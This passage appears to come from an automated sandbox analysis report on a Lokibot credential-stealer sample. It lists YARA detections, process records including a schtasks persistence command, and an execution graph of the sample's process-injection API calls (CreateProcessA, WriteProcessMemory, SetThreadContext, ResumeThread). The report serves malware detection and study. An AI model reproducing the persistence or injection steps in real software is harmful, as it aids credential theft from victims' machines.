                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 55%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:10
                                    Start time:11:14:13
                                    Start date:03/12/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff6ef0c0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:11:14:20
                                    Start date:03/12/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"
                                    Imagebase:0x4d0000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:11:14:20
                                    Start date:03/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:16
                                    Start time:11:14:21
                                    Start date:03/12/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788
                                    Imagebase:0xf00000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:155
                                      Total number of Limit Nodes:5
                                      execution_graph 32226 7b07850 32227 7b07865 32226->32227 32232 7b07890 32227->32232 32246 7b078ee 32227->32246 32261 7b07880 32227->32261 32228 7b07877 32233 7b078aa 32232->32233 32234 7b078ce 32233->32234 32275 7b07fe5 32233->32275 32285 7b08492 32233->32285 32290 7b07e11 32233->32290 32297 7b08161 32233->32297 32303 7b08070 32233->32303 32308 7b07cf0 32233->32308 32313 7b082dd 32233->32313 32317 7b0841c 32233->32317 32322 7b07eba 32233->32322 32327 7b07ff9 32233->32327 32331 7b07df9 32233->32331 32234->32228 32247 7b0787c 32246->32247 32248 7b078f1 32246->32248 32249 7b07cf0 2 API calls 32247->32249 32250 7b08070 2 API calls 32247->32250 32251 7b08161 2 API calls 32247->32251 32252 7b07e11 4 API calls 32247->32252 32253 7b08492 2 API calls 32247->32253 32254 7b07fe5 4 API calls 32247->32254 32255 7b078ce 32247->32255 32256 7b07df9 2 API calls 32247->32256 32257 7b07ff9 2 API calls 32247->32257 32258 7b07eba 2 API calls 32247->32258 32259 7b0841c 2 API calls 32247->32259 32260 7b082dd 2 API calls 32247->32260 32248->32228 32249->32255 32250->32255 32251->32255 32252->32255 32253->32255 32254->32255 32255->32228 32256->32255 32257->32255 32258->32255 32259->32255 32260->32255 32262 7b07885 32261->32262 32263 7b078ce 32262->32263 32264 7b07cf0 2 API calls 32262->32264 32265 7b08070 2 API calls 32262->32265 32266 7b08161 2 API calls 32262->32266 32267 7b07e11 4 API calls 32262->32267 32268 7b08492 2 API calls 32262->32268 32269 7b07fe5 4 API calls 32262->32269 32270 7b07df9 2 API calls 32262->32270 32271 7b07ff9 2 API calls 32262->32271 32272 7b07eba 2 API calls 32262->32272 32273 7b0841c 2 API calls 32262->32273 32274 7b082dd 2 API calls 32262->32274 32263->32228 32264->32263 32265->32263 32266->32263 32267->32263 32268->32263 32269->32263 32270->32263 32271->32263 32272->32263 32273->32263 32274->32263 32276 7b07ff2 32275->32276 32278 7b08087 32275->32278 32277 7b084a1 32276->32277 32276->32278 32344 7b039e0 32277->32344 32348 7b039e8 32277->32348 32280 7b07ea0 32278->32280 32336 7b03931 32278->32336 32340 7b03938 32278->32340 32279 7b084bc 32280->32234 32286 7b084a1 32285->32286 32288 7b039e0 Wow64SetThreadContext 32286->32288 32289 7b039e8 Wow64SetThreadContext 32286->32289 32287 7b084bc 32288->32287 32289->32287 32352 7b03c70 32290->32352 32356 7b03c68 32290->32356 32291 7b07df9 32291->32234 32360 7b03b80 32291->32360 32364 7b03b79 32291->32364 32292 7b081b2 32292->32234 32300 7b07df9 32297->32300 32298 7b0864b 32298->32234 32299 7b081b2 32299->32234 32300->32234 32300->32298 32301 7b03b80 WriteProcessMemory 32300->32301 32302 7b03b79 WriteProcessMemory 32300->32302 32301->32299 32302->32299 32304 7b08076 32303->32304 32306 7b03931 ResumeThread 32304->32306 32307 7b03938 ResumeThread 32304->32307 32305 7b07ea0 32305->32234 32306->32305 32307->32305 32309 7b07d3f 32308->32309 32368 7b03e08 32309->32368 32372 7b03dfc 32309->32372 32376 7b03ac0 32313->32376 32380 7b03ab8 32313->32380 32314 7b082ff 32318 7b08425 32317->32318 32320 7b03b80 WriteProcessMemory 32318->32320 32321 7b03b79 WriteProcessMemory 32318->32321 32319 7b08502 32320->32319 32321->32319 32323 7b0865b 32322->32323 32325 7b039e0 Wow64SetThreadContext 32323->32325 32326 7b039e8 Wow64SetThreadContext 32323->32326 32324 7b08676 32325->32324 32326->32324 32329 7b03b80 WriteProcessMemory 32327->32329 32330 7b03b79 WriteProcessMemory 32327->32330 32328 7b0802a 32328->32234 32329->32328 32330->32328 32332 7b07e04 32331->32332 32332->32234 32332->32331 32334 7b03b80 WriteProcessMemory 32332->32334 32335 7b03b79 WriteProcessMemory 32332->32335 32333 7b081b2 32333->32234 32334->32333 32335->32333 32337 7b03978 ResumeThread 32336->32337 32339 7b039a9 32337->32339 32339->32280 32341 7b03978 ResumeThread 32340->32341 32343 7b039a9 32341->32343 32343->32280 32345 7b039e5 Wow64SetThreadContext 32344->32345 32347 7b03a75 32345->32347 32347->32279 32349 7b03a2d Wow64SetThreadContext 32348->32349 32351 7b03a75 32349->32351 32351->32279 32353 7b03cbb ReadProcessMemory 32352->32353 32355 7b03cff 32353->32355 32355->32291 32357 7b03c70 ReadProcessMemory 32356->32357 32359 7b03cff 32357->32359 32359->32291 32361 7b03bc8 WriteProcessMemory 32360->32361 32363 7b03c1f 32361->32363 32363->32292 32365 7b03bc8 WriteProcessMemory 32364->32365 32367 7b03c1f 32365->32367 32367->32292 32369 7b03e91 CreateProcessA 32368->32369 32371 7b04053 32369->32371 32371->32371 32373 7b03e91 CreateProcessA 32372->32373 32375 7b04053 32373->32375 32375->32375 32377 7b03b00 VirtualAllocEx 32376->32377 32379 7b03b3d 32377->32379 32379->32314 32381 7b03b00 VirtualAllocEx 32380->32381 32383 7b03b3d 32381->32383 32383->32314 32207 187b390 32210 187b478 32207->32210 32208 187b39f 32211 187b436 32210->32211 32213 187b482 32210->32213 32211->32208 32212 187b4bc 32212->32208 32213->32212 32214 187b6c0 GetModuleHandleW 32213->32214 32215 187b6ed 32214->32215 32215->32208 32216 187d720 32217 187d766 32216->32217 32220 187d900 32217->32220 32223 187b374 32220->32223 32224 187d968 DuplicateHandle 32223->32224 32225 187d853 32224->32225 32405 7b08bc8 32406 7b08d53 32405->32406 32407 7b08bee 32405->32407 32407->32406 32410 7b08e41 PostMessageW 32407->32410 32412 7b08e48 PostMessageW 32407->32412 32411 7b08eb4 32410->32411 32411->32407 32413 7b08eb4 32412->32413 32413->32407 32384 1874668 32385 187467a 32384->32385 32386 1874686 32385->32386 32388 1874778 32385->32388 32389 187479d 32388->32389 32393 1874879 32389->32393 32397 1874888 32389->32397 32395 1874888 32393->32395 32394 187498c 32394->32394 32395->32394 32401 18744b4 32395->32401 32398 18748af 32397->32398 32399 18744b4 CreateActCtxA 32398->32399 32400 187498c 32398->32400 32399->32400 32402 1875918 CreateActCtxA 32401->32402 32404 18759db 32402->32404

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1000 56a2d18-56a2d49 1001 56a2d4b 1000->1001 1002 56a2d50-56a2dc4 1000->1002 1001->1002 1003 56a321f-56a3248 call 56a1614 1002->1003 1006 56a2dc9-56a2dd0 1003->1006 1007 56a324e-56a3255 1003->1007 1008 56a31ec-56a3215 call 56a1604 1006->1008 1011 56a321b-56a321c 1008->1011 1012 56a2dd5-56a2de3 1008->1012 1011->1003 1013 56a2e0e-56a2e1f call 56a15f4 1012->1013 1014 56a2de5-56a2e0c call 56a15f4 1012->1014 1017 56a2e24-56a2eb1 1013->1017 1014->1017 1024 56a2eb8-56a2ec8 1017->1024 1025 56a2eb3 1017->1025 1026 56a2eca 1024->1026 1027 56a2ecf-56a2edf 1024->1027 1025->1024 1026->1027 1028 56a2ee1 1027->1028 1029 56a2ee6-56a2f09 1027->1029 1028->1029 1030 56a2feb-56a2ffc 1029->1030 1031 56a2f0f-56a2f21 1029->1031 1032 56a30da-56a30f6 1030->1032 1033 56a3002-56a3022 1030->1033 1034 56a2f2b-56a2f3b 1031->1034 1041 56a30f8-56a3137 1032->1041 1042 56a3139 1032->1042 1039 56a3029-56a303a 1033->1039 1040 56a3024 1033->1040 1037 56a2f3d 1034->1037 1038 56a2f42-56a2f56 1034->1038 1037->1038 1043 56a2f58 1038->1043 1044 56a2f5d-56a2f70 1038->1044 1045 56a303c 1039->1045 1046 56a3041-56a307d 1039->1046 1040->1039 1047 56a3143-56a3151 1041->1047 1042->1047 1043->1044 1048 56a2f72 1044->1048 1049 56a2f77-56a2f8b 1044->1049 1045->1046 1063 56a30c4-56a30d7 1046->1063 1053 56a315a-56a3192 1047->1053 1054 56a3153-56a3155 1047->1054 1048->1049 1050 56a2f8d 1049->1050 1051 56a2f92-56a2fa5 1049->1051 1050->1051 1055 56a2fac-56a2fc0 1051->1055 1056 56a2fa7 1051->1056 1058 56a31b6-56a31d0 1053->1058 1059 56a3194-56a31b4 1053->1059 1054->1007 1061 56a2fc2 1055->1061 1062 56a2fc7-56a2fe6 1055->1062 1056->1055 1060 56a31d6-56a31eb 1058->1060 1059->1060 1060->1008 1061->1062 1062->1032 1064 56a30d9 1063->1064 1065 56a307f-56a308c 1063->1065 1064->1032 1066 56a308e 1065->1066 1067 56a3093-56a30a0 1065->1067 1066->1067 1069 56a30a2 1067->1069 1070 56a30a7-56a30c1 1067->1070 1069->1070 1070->1063
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: *
                                      • API String ID: 0-163128923
                                      • Opcode ID: d2114ecd65ee1c39ef2b85f9e07837857e165d6e7d6f757d02c01b378b51fdb4
                                      • Instruction ID: e8950e4fcb9f4d94a6572d3230fe85a1d2468acd46ffa124a2996e11ed07bbb3
                                      • Opcode Fuzzy Hash: d2114ecd65ee1c39ef2b85f9e07837857e165d6e7d6f757d02c01b378b51fdb4
                                      • Instruction Fuzzy Hash: 2DF1DD75E01268CFDB24CFA9C984B9EBBB2BF49301F1484AAD409AB351D7749E85CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f6542f5172ac68c0628f1e9b22ccaa8d729dc31be6998d4f2301fd35df0dc6c
                                      • Instruction ID: 7324a81acfbc001c06e39f10de81b7a2a3900bbc0ec4b2ad82a9113db07b2e96
                                      • Opcode Fuzzy Hash: 2f6542f5172ac68c0628f1e9b22ccaa8d729dc31be6998d4f2301fd35df0dc6c
                                      • Instruction Fuzzy Hash: D332AEB17012058FEB19DB69C594BAEBBF6EF89700F1484A9E046DB391CB31ED01CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63ae14995d32a9e3d6d7f770af0240e6d59cd9defd6331d212c824b960f35916
                                      • Instruction ID: cf34ee43e33af3b63b62ea63626a7568d2a8e66183c9240b80009751e74ec25a
                                      • Opcode Fuzzy Hash: 63ae14995d32a9e3d6d7f770af0240e6d59cd9defd6331d212c824b960f35916
                                      • Instruction Fuzzy Hash: 1D6105B4911229EFDB14DFA8D888EEDBBF1FF49305F0440A9E405AB2A1CB745A54CF80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b10d7bd590e586f03b2b9ca1acb5a0f5006a8fd95f15483d189dd169c6e3b007
                                      • Instruction ID: b938601318f714956c131c407488fabd85a944ed4d08752c1cfe04557d7945ce
                                      • Opcode Fuzzy Hash: b10d7bd590e586f03b2b9ca1acb5a0f5006a8fd95f15483d189dd169c6e3b007
                                      • Instruction Fuzzy Hash: 0651E3B4E11219EFDB15DFA8D888AEDBBF1FF49305F0440A9E405A7290CB745944CF85

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 294 56ab570-56ab587 296 56ab5ea-56ab5f8 294->296 297 56ab589-56ab598 294->297 300 56ab5fa-56ab605 call 56a9f4c 296->300 301 56ab60b-56ab60d 296->301 297->296 302 56ab59a-56ab5a6 call 56a9ff8 297->302 300->301 308 56ab6ca-56ab742 300->308 396 56ab60f call 56ab570 301->396 397 56ab60f call 56ab561 301->397 309 56ab5ba-56ab5d6 302->309 310 56ab5a8-56ab5b4 call 56aa008 302->310 305 56ab615-56ab624 314 56ab63c-56ab63f 305->314 315 56ab626-56ab637 call 56aa018 305->315 337 56ab74b-56ab755 308->337 338 56ab744-56ab74a 308->338 323 56ab5dc-56ab5e0 309->323 324 56ab685-56ab6c3 309->324 310->309 318 56ab640-56ab67e 310->318 315->314 318->324 323->296 324->308 342 56ab75b-56ab774 call 56aa03c * 2 337->342 343 56ab991-56ab9bd 337->343 350 56ab77a-56ab79c 342->350 351 56ab9c4-56aba1d 342->351 343->351 358 56ab79e-56ab7ac call 56aa018 350->358 359 56ab7ad-56ab7bc 350->359 364 56ab7be-56ab7db 359->364 365 56ab7e1-56ab802 359->365 364->365 372 56ab852-56ab87a 365->372 373 56ab804-56ab815 365->373 398 56ab87d call 56abc60 372->398 399 56ab87d call 56abc51 372->399 376 56ab817-56ab82f call 56aa04c 373->376 377 56ab844-56ab848 373->377 384 56ab831-56ab832 376->384 385 56ab834-56ab842 376->385 377->372 380 56ab880-56ab8a5 387 56ab8eb 380->387 388 56ab8a7-56ab8bc 380->388 384->385 385->376 385->377 387->343 388->387 391 56ab8be-56ab8e1 388->391 391->387 395 56ab8e3 391->395 395->387 396->305 397->305 398->380 399->380
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hgq$Hgq$Hgq$Hgq$Hgq
                                      • API String ID: 0-2022333140
                                      • Opcode ID: 83712c82e0bd0a17a087d44b574e536e4d03cfcdb450f693e46679bcd84250d5
                                      • Instruction ID: 9c64c427fb9c06252f286e50ba51502c71b3a7d88843ab938c574df92a8b24a8
                                      • Opcode Fuzzy Hash: 83712c82e0bd0a17a087d44b574e536e4d03cfcdb450f693e46679bcd84250d5
                                      • Instruction Fuzzy Hash: 9AB159357002088FCB59EFB8C5589AE77F6BF89304B6444A9D402AB7A0DF35ED45CB61

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 400 56a1820-56a4462 403 56a446b-56a447b 400->403 404 56a4464-56a4466 400->404 406 56a4481-56a4491 403->406 407 56a4546-56a4618 403->407 405 56a451a-56a453f 404->405 405->407 406->407 408 56a4497-56a449b 406->408 426 56a461f-56a4662 call 56a3e4c call 56a3e88 407->426 410 56a449d 408->410 411 56a44a3-56a44c2 408->411 410->407 410->411 413 56a44e9-56a44ee 411->413 414 56a44c4-56a44e4 call 56a3e4c call 56a3e5c call 56a1810 411->414 415 56a44f0-56a44f2 call 56a3e6c 413->415 416 56a44f7-56a450a call 56a3e7c 413->416 414->413 415->416 416->426 427 56a4510-56a4517 416->427 443 56a4667-56a466a 426->443 427->405 444 56a4678-56a46f5 call 56a3e94 443->444 445 56a466c-56a466e 443->445 447 56a46fc-56a4710 444->447 445->447 448 56a4674-56a4677 445->448
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (gq$Hgq$Hgq
                                      • API String ID: 0-3930999914
                                      • Opcode ID: 14f0d7c5084a487684f9053526f4aa568e436236ea512a558ca51fbf70ca0ef1
                                      • Instruction ID: 5386fa2b062d7fd08325dd78d1bed49152eeb80ef85234e80058695a49bd61ee
                                      • Opcode Fuzzy Hash: 14f0d7c5084a487684f9053526f4aa568e436236ea512a558ca51fbf70ca0ef1
                                      • Instruction Fuzzy Hash: 8D71AE71B0020A9FCB14AFB8C85566F7AB6EFC8300B10896AD546DB391DF349C46CBA5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 568 56a5988-56a59ea call 56a4170 574 56a59ec-56a59ee 568->574 575 56a5a50-56a5a7c 568->575 576 56a5a83-56a5a8b 574->576 577 56a59f4-56a5a00 574->577 575->576 582 56a5a92-56a5bcd 576->582 577->582 583 56a5a06-56a5a08 577->583 600 56a5bd3-56a5be1 582->600 584 56a5a12-56a5a4f call 56a417c 583->584 601 56a5bea-56a5c30 600->601 602 56a5be3-56a5be9 600->602 607 56a5c3d 601->607 608 56a5c32-56a5c35 601->608 602->601 609 56a5c3e 607->609 608->607 609->609
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hgq$Hgq
                                      • API String ID: 0-3391890871
                                      • Opcode ID: 88eb99120de8bc99ead159afabde4885abf4405784d330af455afcf1edcbe489
                                      • Instruction ID: 696b2d291c1da70bdcc5b75d5d8a9d6448b165aee5bee7311b19ca5d3533c5de
                                      • Opcode Fuzzy Hash: 88eb99120de8bc99ead159afabde4885abf4405784d330af455afcf1edcbe489
                                      • Instruction Fuzzy Hash: 75718B75E002198FDF04DFA9C854AAEBBF2BF89300F24852AE406EB354DB749D05CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 610 56a1830-56a4233 613 56a423a 610->613 614 56a4235-56a4238 610->614 615 56a423c-56a424a call 56a3e30 613->615 614->615 618 56a425b-56a4267 615->618 619 56a424c-56a4250 615->619 620 56a426a-56a426d 619->620 621 56a4252-56a4258 619->621 622 56a426f-56a42ba 620->622 623 56a42c1-56a42c4 620->623 621->618 622->623 625 56a4318-56a437b 623->625 626 56a42c6-56a4311 623->626 637 56a437d-56a4380 625->637 638 56a4383-56a43a5 625->638 626->625 637->638 640 56a43ab-56a43b6 638->640 642 56a43b8-56a43be 640->642 643 56a43bf-56a43dc 640->643 642->643
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hgq$Hgq
                                      • API String ID: 0-3391890871
                                      • Opcode ID: 183c6d9368e22501f0c27c7018a2e3cf3cee4eb498c7a78cc135ed1edee6bb0f
                                      • Instruction ID: e8d4a1c818f1b7fcf088f0faa41f349fc54e45feade40abd5c22bd8d3f660f5e
                                      • Opcode Fuzzy Hash: 183c6d9368e22501f0c27c7018a2e3cf3cee4eb498c7a78cc135ed1edee6bb0f
                                      • Instruction Fuzzy Hash: 3F5189B5A002098FCB14DFA9C8546AEBBF6FF89310F14846AD416E7380DB789D05CBA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 649 56a4440-56a4462 650 56a446b-56a447b 649->650 651 56a4464-56a4466 649->651 653 56a4481-56a4491 650->653 654 56a4546-56a4618 650->654 652 56a451a-56a453f 651->652 652->654 653->654 655 56a4497-56a449b 653->655 673 56a461f-56a464c call 56a3e4c 654->673 657 56a449d 655->657 658 56a44a3-56a44c2 655->658 657->654 657->658 660 56a44e9-56a44ee 658->660 661 56a44c4-56a44e4 call 56a3e4c call 56a3e5c call 56a1810 658->661 662 56a44f0-56a44f2 call 56a3e6c 660->662 663 56a44f7-56a450a call 56a3e7c 660->663 661->660 662->663 663->673 674 56a4510-56a4517 663->674 687 56a4651-56a4662 call 56a3e88 673->687 674->652 690 56a4667-56a466a 687->690 691 56a4678-56a46f5 call 56a3e94 690->691 692 56a466c-56a466e 690->692 694 56a46fc-56a4710 691->694 692->694 695 56a4674-56a4677 692->695
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (gq$Hgq
                                      • API String ID: 0-3303014377
                                      • Opcode ID: 2f058fa2b1334442df808b7805208a1735279da89f4b5f16d9a52d6fd7d3a819
                                      • Instruction ID: 897a3d67f9339814ee3a368310b8c9d12aadc7a56248a0de4457628766358c7a
                                      • Opcode Fuzzy Hash: 2f058fa2b1334442df808b7805208a1735279da89f4b5f16d9a52d6fd7d3a819
                                      • Instruction Fuzzy Hash: D331F1B1B0010A9FDB48ABBCC82567F7EA6EFD8300B11896A9546A73D4DE348C428794

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 714 7b03dfc-7b03e9d 716 7b03ed6-7b03ef6 714->716 717 7b03e9f-7b03ea9 714->717 724 7b03ef8-7b03f02 716->724 725 7b03f2f-7b03f5e 716->725 717->716 718 7b03eab-7b03ead 717->718 719 7b03ed0-7b03ed3 718->719 720 7b03eaf-7b03eb9 718->720 719->716 722 7b03ebb 720->722 723 7b03ebd-7b03ecc 720->723 722->723 723->723 727 7b03ece 723->727 724->725 726 7b03f04-7b03f06 724->726 733 7b03f60-7b03f6a 725->733 734 7b03f97-7b04051 CreateProcessA 725->734 728 7b03f08-7b03f12 726->728 729 7b03f29-7b03f2c 726->729 727->719 731 7b03f14 728->731 732 7b03f16-7b03f25 728->732 729->725 731->732 732->732 735 7b03f27 732->735 733->734 736 7b03f6c-7b03f6e 733->736 745 7b04053-7b04059 734->745 746 7b0405a-7b040e0 734->746 735->729 738 7b03f70-7b03f7a 736->738 739 7b03f91-7b03f94 736->739 740 7b03f7c 738->740 741 7b03f7e-7b03f8d 738->741 739->734 740->741 741->741 743 7b03f8f 741->743 743->739 745->746 756 7b040f0-7b040f4 746->756 757 7b040e2-7b040e6 746->757 759 7b04104-7b04108 756->759 760 7b040f6-7b040fa 756->760 757->756 758 7b040e8 757->758 758->756 762 7b04118-7b0411c 759->762 763 7b0410a-7b0410e 759->763 760->759 761 7b040fc 760->761 761->759 765 7b0412e-7b04135 762->765 766 7b0411e-7b04124 762->766 763->762 764 7b04110 763->764 764->762 767 7b04137-7b04146 765->767 768 7b0414c 765->768 766->765 767->768 770 7b0414d 768->770 770->770
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B0403E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: a998e3441a76930e4a322da30f7b17fb18a2a71efd01834eb1e3c4f7f289b2a2
                                      • Instruction ID: fe99a8444d17ca1d793162828bd6f15e6a3bb0b892b15346a337cb17ffdbe0ec
                                      • Opcode Fuzzy Hash: a998e3441a76930e4a322da30f7b17fb18a2a71efd01834eb1e3c4f7f289b2a2
                                      • Instruction Fuzzy Hash: 25915CB1D0025ADFEB10DFA8C84579EBFB2FB45314F1481A9D809A7290DB749985CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 771 7b03e08-7b03e9d 773 7b03ed6-7b03ef6 771->773 774 7b03e9f-7b03ea9 771->774 781 7b03ef8-7b03f02 773->781 782 7b03f2f-7b03f5e 773->782 774->773 775 7b03eab-7b03ead 774->775 776 7b03ed0-7b03ed3 775->776 777 7b03eaf-7b03eb9 775->777 776->773 779 7b03ebb 777->779 780 7b03ebd-7b03ecc 777->780 779->780 780->780 784 7b03ece 780->784 781->782 783 7b03f04-7b03f06 781->783 790 7b03f60-7b03f6a 782->790 791 7b03f97-7b04051 CreateProcessA 782->791 785 7b03f08-7b03f12 783->785 786 7b03f29-7b03f2c 783->786 784->776 788 7b03f14 785->788 789 7b03f16-7b03f25 785->789 786->782 788->789 789->789 792 7b03f27 789->792 790->791 793 7b03f6c-7b03f6e 790->793 802 7b04053-7b04059 791->802 803 7b0405a-7b040e0 791->803 792->786 795 7b03f70-7b03f7a 793->795 796 7b03f91-7b03f94 793->796 797 7b03f7c 795->797 798 7b03f7e-7b03f8d 795->798 796->791 797->798 798->798 800 7b03f8f 798->800 800->796 802->803 813 7b040f0-7b040f4 803->813 814 7b040e2-7b040e6 803->814 816 7b04104-7b04108 813->816 817 7b040f6-7b040fa 813->817 814->813 815 7b040e8 814->815 815->813 819 7b04118-7b0411c 816->819 820 7b0410a-7b0410e 816->820 817->816 818 7b040fc 817->818 818->816 822 7b0412e-7b04135 819->822 823 7b0411e-7b04124 819->823 820->819 821 